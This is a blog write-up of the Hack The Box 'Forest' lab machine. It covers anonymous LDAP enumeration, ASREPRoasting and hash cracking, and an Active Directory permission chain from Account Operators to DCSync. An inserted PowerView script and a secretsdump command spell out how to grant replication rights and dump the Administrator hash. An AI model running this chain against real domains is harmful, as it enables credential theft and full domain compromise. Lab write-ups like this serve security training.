HTB - Forest Writeup

Liam Geyer

👾 Machine Overview

This is a writeup of the Forest machine from HTB. It's an easy-difficulty Windows machine (the domain controller for htb.local) that features anonymous LDAP access, ASREPRoasting, and a chain of AD permission misconfigurations leading from Account Operators to DCSync.

🔍 Enumeration

An initial nmap scan of the host (default top-1000 ports, version and script detection) gave the following results:

nmap -sV -sC 10.129.95.210 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-29 15:44 EDT
Nmap scan report for 10.129.95.210
Host is up (0.019s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-29 19:51:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-05-29T19:51:20
|_ start_date: 2024-05-29T19:47:08
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2024-05-29T12:51:24-07:00
|_clock-skew: mean: 2h26m50s, deviation: 4h02m32s, median: 6m48s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.15 seconds

I tested for anonymous LDAP access using nmap's ldap scripts (brute-forcing excluded):

nmap -n -sV --script "ldap* and not brute" 10.129.95.210
# Output omitted for brevity

🥈 User

The ldap scripts returned directory data without any credentials, which means anonymous binds are allowed and user objects can be enumerated. With a list of usernames available, I used Impacket's GetNPUsers.py to check whether any accounts have Kerberos pre-authentication disabled (i.e. are ASREPRoastable).

ASREPRoasting

GetNPUsers.py returned an AS-REP hash for svc-alfresco, so I threw it into hashcat (mode 18200, Kerberos 5 AS-REP etype 23).

Cracking svc-alfresco

The password cracked, and I used it to log in over WinRM and grab the user flag.

🥇 Root

I started off by checking svc-alfresco's groups and privileges.

Groups and privs

Looks like we landed on a fairly privileged user: svc-alfresco is a member of both Privileged IT Accounts and Account Operators. Account Operators is a built-in group that can create domain accounts and modify the membership of most non-protected groups, which is a lot of leverage for a service account.

I ran SharpHound to see what targets the account could reach.

BloodHound

This path didn't make much sense to me. BloodHound shows the Administrator with a session on FOREST, so in principle we could dump his credentials from LSASS, but that requires local admin on the box and svc-alfresco isn't one. I decided to keep digging through BloodHound for any interesting permissions we might hold instead.

BloodHound

The Account Operators group has GenericAll over the Exchange Windows Permissions group, which in turn has WriteDacl over the domain object itself.

As a result, we can first create a new user and add them to Exchange Windows Permissions, then use that group's WriteDacl to grant the new user the replication rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) that DCSync requires.

Creating a new user

Once that’s done, we’re able to use Impacket’s secretsdump to dump the Administrator’s hash.
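The chain described above, as an added example that is not code from the original writeup: the PowerView commands as they would be run inside the svc-alfresco WinRM session. The user name and password are placeholders I chose, and the example assumes PowerView.ps1 (PowerSploit dev branch) has already been dot-sourced into the session; the PowerView function names and the net.exe commands are real.

```powershell
# Added example (not the original writeup's code).
# Abuse: Account Operators -> GenericAll on "Exchange Windows Permissions"
#        -> WriteDacl on the domain object -> grant DCSync rights to a new user.
# Assumes PowerView is loaded in the svc-alfresco session, e.g.:  . .\PowerView.ps1
# $NewUser / $NewPass are placeholders chosen for this example.
$NewUser  = 'lfgtest'
$NewPass  = 'P@ssw0rd123!'
$Domain   = 'htb.local'
$DomainDN = 'DC=htb,DC=local'

# 1. Account Operators may create domain user accounts.
net user $NewUser $NewPass /add /domain

# 2. GenericAll on Exchange Windows Permissions lets us add the new user to it.
net group "Exchange Windows Permissions" $NewUser /add /domain

# 3. Build a credential for the new user. The group membership only exists in the
#    new user's token, not in svc-alfresco's current session, so PowerView has to
#    authenticate as that user when it writes the domain's DACL.
$SecPass = ConvertTo-SecureString $NewPass -AsPlainText -Force
$Cred    = New-Object System.Management.Automation.PSCredential("$Domain\$NewUser", $SecPass)

# 4. WriteDacl on the domain object: -Rights DCSync adds the replication extended
#    rights (DS-Replication-Get-Changes, -Get-Changes-All, -Get-Changes-In-Filtered-Set).
Add-DomainObjectAcl -Credential $Cred -TargetIdentity $DomainDN -PrincipalIdentity $NewUser -Rights DCSync -Verbose

# 5. Verify the ACEs actually landed before leaving the session: list the
#    replication ACEs on the domain object whose trustee is our new user.
$Sid = ConvertTo-SID $NewUser
Get-DomainObjectAcl -Identity $DomainDN -ResolveGUIDs |
    Where-Object { $_.SecurityIdentifier.Value -eq $Sid -and $_.ObjectAceType -like 'DS-Replication-Get-Changes*' } |
    Select-Object ObjectAceType, ActiveDirectoryRights, SecurityIdentifier
```

If step 5 prints the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All ACEs for the new user's SID, the account can replicate from the DC. From the attack box, `secretsdump.py 'htb.local/lfgtest:P@ssw0rd123!@10.129.95.210' -just-dc-user Administrator` then pulls only the Administrator hash rather than the whole NTDS, which is both faster and less noisy.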

DCSync

I then used that hash to WinRM in and grab the flag.

Shell as Administrator

I tried to exploit this a couple of different ways, including adding the svc-alfresco user itself to the group. It only seemed to work reliably when using PowerView to create a new user and target that user for the attack.

📖 Resources

ASREPRoasting (Cybersec Notes)
Account Operators PrivEsc (White Oak Security)
  • Title: HTB - Forest Writeup
  • Author: Liam Geyer
  • Created at : 2024-07-26 00:00:00
  • Updated at : 2024-10-10 09:01:47
  • Link: https://lfgberg.org/2024/07/26/htb/forest/
  • License: This work is licensed under CC BY-NC-SA 4.0.